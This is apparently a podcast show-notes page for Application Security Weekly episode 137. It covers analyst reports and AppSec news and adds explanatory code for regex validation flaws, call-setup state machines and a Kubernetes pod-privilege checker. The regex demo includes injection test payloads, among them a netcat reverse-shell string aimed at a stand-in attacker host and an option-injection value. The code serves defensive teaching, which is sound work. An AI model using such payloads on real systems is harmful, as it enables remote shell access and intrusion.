A Tree of Woe – ASW #137
This week, we welcome back Taylor McCaslin, Sr. Product Manager of Secure at GitLab, to discuss Reading Industry Analyst Tea Leaves To Predict The Future! It's analyst season with the new Forrester Wave on SAST recently published as well as Gartner's Application Security Testing Magic Quadrant publishing in April. We'll talk about what analyst reports are, how you should use them, and how you should interpret placement on them, or, as I like to call it, reading the analyst tea leaves.
In the AppSec News, an overflow and a flawed regex paint an RCE picture for Kindle, messaging apps miss the message on secure state machines, three pillars of a data security strategy for the cloud, where DoH might fit into AppSec, and all the things that can go wrong when you give up root in your Kubernetes pod!
Visit https://securityweekly.com/GitLab to learn more about them!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly
This segment is sponsored by GitLab.
Visit https://securityweekly.com/GitLab to learn more about them!
Don't miss any of your favorite Security Weekly content! Visit https://securityweekly.com/subscribe to subscribe to any of our podcast feeds and have all new episodes downloaded right to your phone! You can also join our mailing list, Discord server, and follow us on social media & our streaming platforms!
Don't forget to check out our library of on-demand webcasts & technical trainings at securityweekly.com/ondemand.
Taylor McCaslin (he/him) is a multi-disciplinary Investor, Product Manager, and Technologist living in Austin, Texas. Taylor works as a Senior Product Manager at GitLab focused on Security products. He is also the Founder of Product Trust Investments, an angel fund focused on impact investing with companies that build ethical products that customers trust. Since 2012 he has worked at enterprise-scale, hyper-growth technology companies including: New Knowledge, Duo Security, WP Engine, Indeed.com, Bazaarvoice. Taylor can be found geeking out with the latest Apple gadget, skiing, or enjoying the expansive Austin art scene. He also enjoys volunteering with local human rights and LGBTQ organizations around central Texas as well as mentoring young technologists looking to start careers in tech.
An overflow and a flawed regex paint an RCE picture for Kindle, messaging apps miss the message on secure state machines, three pillars of a data security strategy for the cloud, where DoH might fit into AppSec, and all the things that can go wrong when you give up root in your Kubernetes pod.
Do you have a specific guest or topic that you want us to cover on one of the shows? Submit your suggestions for guests by visiting https://securityweekly.com/guests and completing the form! We review suggestions monthly and will reach out to you once reviewed!
If you missed Security Weekly Unlocked, you can now access all of the content on-demand, whether you registered before the live event or not, by visiting https://securityweekly.com/unlocked and clicking either the button to register or the button to login!
- 1. KindleDrip — From Your Kindle’s Email Address to Using Your Credit Card - A researcher pokes around Kindle's firmware, finds an image decoding library with an overflow flaw, and paints a picture of RCE. And for extra credit, the researcher also found a flaw in a regex intended to prevent injection attacks.
- 2. The State of State Machines - Project Zero picks apart the call-setup protocol implementations for several messaging apps and discovers that a number of them can be confused into transmitting the callee's audio or video before the callee has answered, because the implementation infers its state from the order messages happen to arrive in rather than tracking it explicitly. It's also a good overview of WebRTC and protocol analysis in general. We even touched on state machines and fuzzing in the previous episode 136, https://securityweekly.com/asw136.
- 3. Bad Pods: Kubernetes Pod Privilege Escalation - A nice overview of Kubernetes pod security assumptions (privileged, hostPID, hostNetwork, hostIPC, hostPath volumes, and the automounted service account token) and what happens when a lack of least privilege turns into mostly accessed.
- 4. NSA Recommends How Enterprises Can Securely Adopt Encrypted DNS - You might not be in charge of your org's shift to DNS over HTTPS (DoH), but it does present a chance to apply threat modeling exercises to where you'll gain or lose visibility in the security of your DevOps endpoints and the network connections being made throughout the CI/CD pipeline. You can find the report at https://media.defense.gov/2021/Jan/14/2002564889/-1/-1/0/CSI_ADOPTING_ENCRYPTED_DNS_U_OO_102904_21.PDF
- 5. Designing and deploying a data security strategy with Google Cloud - You can skip over the specific references to Google Cloud products and still gain a good understanding of how to approach a data security program for your own environment regardless of cloud service provider. You can find the paper at https://services.google.com/fh/files/misc/designing_and_deploying_data_security_strategy.pdf
- 6. Real World Crypto 2021 - Real World Crypto ran from January 11th through the 14th. Two sessions in particular are relevant to areas we've touched on in the podcast, one talks in more detail about the end-to-end encryption for Zoom and the other talks about the importance of understanding user needs in designing systems. - "E2E Encryption and Identity Properties for Zoom Meetings" with slides (https://iacr.org/submit/files/slides/2021/rwc/rwc2021/91/slides.pdf) and video (https://youtu.be/jeQvDLPQsuw?t=1814) - "Mental Models of Cryptographic Protocols - Understanding Users to Improve Security" with slides (https://iacr.org/submit/files/slides/2021/rwc/rwc2021/95/slides.pdf) and video (https://youtu.be/-mBlQVEXcB8?t=3)
- 7. Firefox fails to load favicon from HTTP cache - What sounds at first like an innocuous bug report turns into an interesting situation on vuln research, disclosure, and ethics. And it's something that could generalize to bug bounty and other vuln disclosure programs.
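The KindleDrip item above ends with a regex that was supposed to stop injection and didn't. The block below is an added illustration, not the Kindle firmware's regex or any code from the researcher's write-up: it shows the two classic ways an "allowed characters" regex silently fails (prefix-only matching, and alternation that splits the anchors) next to a check that actually constrains the whole value, using a hypothetical privileged helper that builds a `cat` argv from a caller-supplied profile name.

```python
import re

# Illustrative validation regexes for a hypothetical privileged helper that
# builds a command line from a caller-supplied name. These are NOT the
# Kindle firmware's actual regex; they show two classic failure modes and
# what a correct check looks like.

# Flaw 1: re.match() only anchors at the start, so any string with a benign
# prefix passes; everything after the prefix is never examined.
PREFIX_ONLY = re.compile(r"[A-Za-z0-9_-]+")

# Flaw 2: alternation binds more loosely than the anchors, so this means
# (^[A-Za-z0-9_-]+) OR ([0-9]+$): a benign head *or* a numeric tail passes.
SPLIT_ANCHORS = re.compile(r"^[A-Za-z0-9_-]+|[0-9]+$")

# Correct: fullmatch() requires the whole string to match, and the first
# character may not be '-' so the value cannot be parsed as an option
# ("-rf") by whatever command it ends up being passed to.
STRICT = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_-]*")


def is_safe_prefix_only(value: str) -> bool:
    return PREFIX_ONLY.match(value) is not None


def is_safe_split_anchors(value: str) -> bool:
    return SPLIT_ANCHORS.search(value) is not None


def is_safe_strict(value: str) -> bool:
    return STRICT.fullmatch(value) is not None


def build_command(value: str, validator) -> list:
    """Return the argv the helper would run for `value`, or raise ValueError.
    Passing an argv list (no shell) is the second layer of defence: even if a
    validator is wrong, ';' and '|' are then bytes in an argument, not syntax."""
    if not validator(value):
        raise ValueError(f"rejected: {value!r}")
    return ["cat", f"/var/local/profiles/{value}.json"]


def evaluate(payloads):
    """Run every payload through the three validators; True means 'accepted'."""
    return {p: (is_safe_prefix_only(p), is_safe_split_anchors(p), is_safe_strict(p))
            for p in payloads}


# Constructed inputs: one benign name and three injection attempts.
PAYLOADS = [
    "user42",
    "user42; nc attacker.example 4444 -e /bin/sh",  # metacharacters after a clean prefix
    "; nc attacker.example 4444 -e /bin/sh 1",       # only the numeric tail is clean
    "-rf",                                           # option injection, charset-clean
]

if __name__ == "__main__":
    for payload, verdicts in evaluate(PAYLOADS).items():
        print(f"{payload!r:48} prefix_only={verdicts[0]} "
              f"split_anchors={verdicts[1]} strict={verdicts[2]}")
```

Only the `STRICT` check rejects all three attack strings; note that it does so by also refusing a leading hyphen, which a pure "allowed characters" test would wave through even with correct anchoring.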
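For the state machine item, here is an added toy model of a callee's call-setup logic, written for this page rather than taken from Project Zero's post or from any of the apps it examined; the message names (`offer`, `answer`, `connect`, `hangup`) are simplified assumptions standing in for the apps' real signalling. The vulnerable version starts sending media as soon as a `connect` arrives, because it assumes that message can only follow the user's answer; the hardened version tracks consent and transport readiness as explicit state, so an early `connect` is remembered but never turns the microphone on by itself.

```python
from enum import Enum, auto


class State(Enum):
    IDLE = auto()       # no call
    RINGING = auto()    # offer received, local user has not answered
    ANSWERED = auto()   # local user accepted, media transport not yet up
    CONNECTED = auto()  # transport up AND user consented: media flows
    ENDED = auto()


class VulnerableCallee:
    """Infers state from message order: a 'connect' from the peer is taken to
    mean the local user already answered, so media starts on receipt."""

    def __init__(self):
        self.state = State.IDLE
        self.transmitting = False

    def handle(self, event: str) -> State:
        if event == "offer":
            self.state = State.RINGING
        elif event == "answer":
            self.state = State.ANSWERED
        elif event == "connect":
            # BUG: nothing checks that the local user actually answered
            self.state = State.CONNECTED
            self.transmitting = True
        elif event == "hangup":
            self.state = State.ENDED
            self.transmitting = False
        return self.state


class HardenedCallee:
    """Explicit (state, event) transitions; anything else is dropped and
    recorded. Transport readiness is remembered separately from consent,
    so an early 'connect' is tolerated but never starts media by itself."""

    def __init__(self):
        self.state = State.IDLE
        self.transport_ready = False
        self.transmitting = False
        self.rejected = []  # (state, event) pairs that arrived out of order

    def handle(self, event: str) -> State:
        s = self.state
        if s is State.IDLE and event == "offer":
            self.state = State.RINGING
        elif s is State.RINGING and event == "connect":
            self.transport_ready = True  # remember it, but stay RINGING
        elif s is State.RINGING and event == "answer":
            self.state = State.CONNECTED if self.transport_ready else State.ANSWERED
        elif s is State.ANSWERED and event == "connect":
            self.transport_ready = True
            self.state = State.CONNECTED
        elif event == "hangup" and s in (State.RINGING, State.ANSWERED, State.CONNECTED):
            self.state = State.ENDED
        else:
            self.rejected.append((s, event))
        # Media is a function of the state, never of the last message seen.
        self.transmitting = self.state is State.CONNECTED
        return self.state


def run(callee_cls, events):
    """Replay a signalling sequence; report final state, whether media is
    flowing, and whether it ever flowed before the local user answered."""
    callee = callee_cls()
    answered = leaked = False
    for ev in events:
        answered = answered or ev == "answer"
        callee.handle(ev)
        leaked = leaked or (callee.transmitting and not answered)
    return callee.state, callee.transmitting, leaked


# Constructed signalling sequences (assumed message names, not a real app's).
ATTACK = ["offer", "connect"]                      # caller sends 'connect' before the callee answers
NORMAL = ["offer", "answer", "connect"]
EARLY_TRANSPORT = ["offer", "connect", "answer"]   # legitimate reordering on a slow network

if __name__ == "__main__":
    for name, seq in [("attack", ATTACK), ("normal", NORMAL), ("early-transport", EARLY_TRANSPORT)]:
        print(f"{name:16} vulnerable={run(VulnerableCallee, seq)}  hardened={run(HardenedCallee, seq)}")
```

The point of `run()` is the third value it returns: for the `ATTACK` sequence the vulnerable callee reports media flowing with no answer, the hardened one stays in `RINGING`. The hardened version still accepts the `EARLY_TRANSPORT` ordering, which matters because "reject anything out of order" would break calls on slow networks and is what tempts implementers into the lax version in the first place.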
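For the Bad Pods item, the following is an added example, not code from the Bad Pods write-up, that turns its list of dangerous pod attributes into a small checker: given a pod manifest as the dict `yaml.safe_load` would produce, it reports the host namespaces shared, hostPath mounts, privileged containers, added capabilities, explicit root, missing `allowPrivilegeEscalation: false`, and an automounted service account token, and ranks the worst finding. The sample pods and the severity labels are constructed for this example.

```python
from typing import Any, Dict, List, Tuple

Finding = Tuple[str, str]  # (severity, message)

# Capabilities that by themselves reach the node or other pods; the list is
# this example's choice, not an exhaustive or authoritative one.
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "SYS_RAWIO",
                  "NET_ADMIN", "NET_RAW", "DAC_READ_SEARCH", "DAC_OVERRIDE"}
# Node paths whose exposure is as good as node root (assumed list).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/lib/kubelet",
                        "/var/run/docker.sock", "/run/containerd")
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}


def is_sensitive_host_path(path: str) -> bool:
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def check_pod(pod: Dict[str, Any]) -> List[Finding]:
    spec = pod.get("spec", {})
    findings: List[Finding] = []
    for flag in ("hostPID", "hostIPC", "hostNetwork"):
        if spec.get(flag):
            findings.append(("high", f"spec.{flag}=true: pod shares the node's namespace"))
    for vol in spec.get("volumes", []):
        host = vol.get("hostPath")
        if host:
            path = host.get("path", "")
            sev = "critical" if is_sensitive_host_path(path) else "high"
            findings.append((sev, f"volume {vol.get('name')}: hostPath {path} mounted from the node"))
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name = c.get("name", "<unnamed>")
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(("critical", f"container {name}: privileged=true (all capabilities, raw device access)"))
        added = set((sc.get("capabilities") or {}).get("add", []))
        bad = sorted(added & DANGEROUS_CAPS)
        if bad:
            findings.append(("high", f"container {name}: adds capabilities {','.join(bad)}"))
        if sc.get("runAsUser") == 0:
            findings.append(("high", f"container {name}: runAsUser=0"))
        # Kubernetes defaults allowPrivilegeEscalation to true unless set.
        if sc.get("allowPrivilegeEscalation", True):
            findings.append(("medium", f"container {name}: allowPrivilegeEscalation not false (setuid/file caps still work)"))
    # Default is to mount the token; its RBAC scope becomes the attacker's.
    if spec.get("automountServiceAccountToken", True):
        findings.append(("low", "service account token automounted into the pod"))
    return findings


def highest_severity(findings: List[Finding]) -> str:
    return max((f[0] for f in findings), key=SEVERITY_RANK.__getitem__, default="none")


# Constructed sample manifests (dicts as yaml.safe_load would return them).
EVERYTHING_ALLOWED = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "everything-allowed"},
    "spec": {"hostPID": True, "hostIPC": True, "hostNetwork": True,
             "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
             "containers": [{"name": "shell", "image": "alpine",
                             "securityContext": {"privileged": True},
                             "volumeMounts": [{"name": "noderoot", "mountPath": "/host"}]}]}}
HOSTPATH_ONLY = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "hostpath-only"},
    "spec": {"volumes": [{"name": "logs", "hostPath": {"path": "/var/log"}}],
             "containers": [{"name": "app", "image": "busybox",
                             "volumeMounts": [{"name": "logs", "mountPath": "/host/log"}]}]}}
LOCKED_DOWN = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "locked-down"},
    "spec": {"automountServiceAccountToken": False,
             "containers": [{"name": "app", "image": "nginx",
                             "securityContext": {"runAsNonRoot": True,
                                                 "allowPrivilegeEscalation": False,
                                                 "capabilities": {"drop": ["ALL"]}}}]}}

if __name__ == "__main__":
    for pod in (EVERYTHING_ALLOWED, HOSTPATH_ONLY, LOCKED_DOWN):
        findings = check_pod(pod)
        print(f"{pod['metadata']['name']}: {highest_severity(findings)}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```

The "everything allowed" pod is the write-up's worst case and the checker rates it critical on two independent grounds (privileged and a `/` hostPath), so fixing only one of them does not change the verdict. Run this as an admission or CI check and the low and medium findings are the ones that get argued about; they are also the ones whose defaults quietly apply to every pod that does not set them.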
- 1. Reliance on cloud, APIs create confusion and introduce risk into software development - Radware did a study (PDF link in the article) on appsec and API security. Some interesting takeaways and stats; sometimes they take existing data and make you think about it a different way. For example, 71% of respondents mostly or completely trust the level of security offered by their CSPs, but this translates to "71% mostly trust that their customer data won't be compromised by a bad actor." "API security will be first area of investment" for 2021, with security expertise at #3. Interesting predictions too, including "The mad dash to the cloud will undermine application security in 2021" and "Human errors will become more frequent and more costly." Also a reminder to go back and watch Mike's great API security panel from Security Weekly Unlocked!